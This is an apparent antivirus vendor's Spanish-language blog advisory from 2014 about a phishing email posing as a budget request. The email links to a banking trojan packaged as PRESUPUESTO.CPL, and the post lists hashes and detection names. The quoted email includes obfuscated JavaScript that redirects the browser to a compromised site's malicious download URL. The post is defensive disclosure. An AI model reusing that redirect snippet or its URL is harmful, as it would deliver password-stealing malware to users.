NUEVO MAIL MASIVO QUE ANEXA LINK MALICIOSO

Publicado el 21 mayo 2014 ¬ 16:23 pmh.mscComentarios desactivados en NUEVO MAIL MASIVO QUE ANEXA LINK MALICIOSO

Nos llega un mail para analizar, con las siguientes características:
MAIL MALICIOSO
______________

Asunto: Hoja de Trabajo y Presupuesto

Hola,
La semana pasada le pregunté a un presupuesto y no tuve respuesta

Se adjunta el presupuesto remitido previamente presentado

Adjunto: to   <– link malicioso

Por favor, envíe este

a $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:iriscruz@triunfus.com”>iriscruz@triunfus.com
______________________

FIN DEL MAIL MALICIOSO

 

y el enlace ofrecido descarga un fichero malicioso desde una web de  Dallas (TEXAS)  -EE.UU:
ISP: Limestone Networks
Organization: Limestone Networks
Services: None detected
Type: Corporate
Assignment: Static IP
Blacklist:

Geolocation Information
Country: United States
State/Region: Texas
City: Dallas
Latitude: 32.7791  (32° 46′ 44.76″ N)
Longitude: -96.8028  (96° 48′ 10.08″ W)
Area Code: 214
Postal Code: 75202
El fichero descargado es un empaquetado de nombre PRESUPUESTO.ZIP, que contiene el fichero PRESUPUESTO.CPL, el cual se detecta como SPY.DELF , que ya es controlado por el antivirus, y que ademas pasamos a controlar a partir del ELISTARA 20.00 de hoy
MD5 a0e3ec0f623d06965a7434e6ac20c296
SHA1 ac9625f51dd2b95d62752fdc59cbc8fd4df9636e
Tamaño del fichero 224.5 KB ( 229909 bytes )
SHA256: 0f52b87311664d5b1883a2611783bff2f9b1097adda0aca3314841fc27ceb8bf
Nombre: Presupuesto.cpl
Detecciones: 13 / 52
Fecha de análisis: 2014-05-21 14:11:31 UTC ( hace 1 minuto )

0 1
Antivirus  Resultado  Actualización
Ad-Aware  Gen:Variant.Kazy.13280  20140521
BitDefender  Gen:Variant.Kazy.13280  20140521
Bkav  HW32.CDB.7ae6  20140521
CMC  Packed.Win32.Klone!O  20140521
ESET-NOD32  a variant of Win32/Spy.Delf.PRU  20140521
Emsisoft  Gen:Variant.Kazy.13280 (B)  20140521
F-Secure  Gen:Variant.Kazy.13280  20140521
GData  Gen:Variant.Kazy.13280  20140521
Kaspersky  Trojan-Banker.Win32.ChePro.ink  20140521
MicroWorld-eScan  Gen:Variant.Kazy.13280  20140521
TrendMicro  PAK_Generic.006  20140521
TrendMicro-HouseCall  PAK_Generic.006  20140521
VBA32  suspected of Trojan.Notifier.gen  20140521

Dicha version del ELISTARA 30.00 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy

 

NOTA: Si bien en este caso no lo ha hecho, otras variantes parecidas generaban ficheros con caracteristicas de SPY BANKER (cazapasswords bancarios), que quizas por no estar actualmente disponibles las webs de descarga, esta vez no lo ha hecho, lo cual no quiere decir que no lo pueda hacer en otro momento… Tenerlo presente por lo que puede conllevar un cazapasswords en el sistema !

 

saludos

ms, 21-5-2014

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Virus, , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies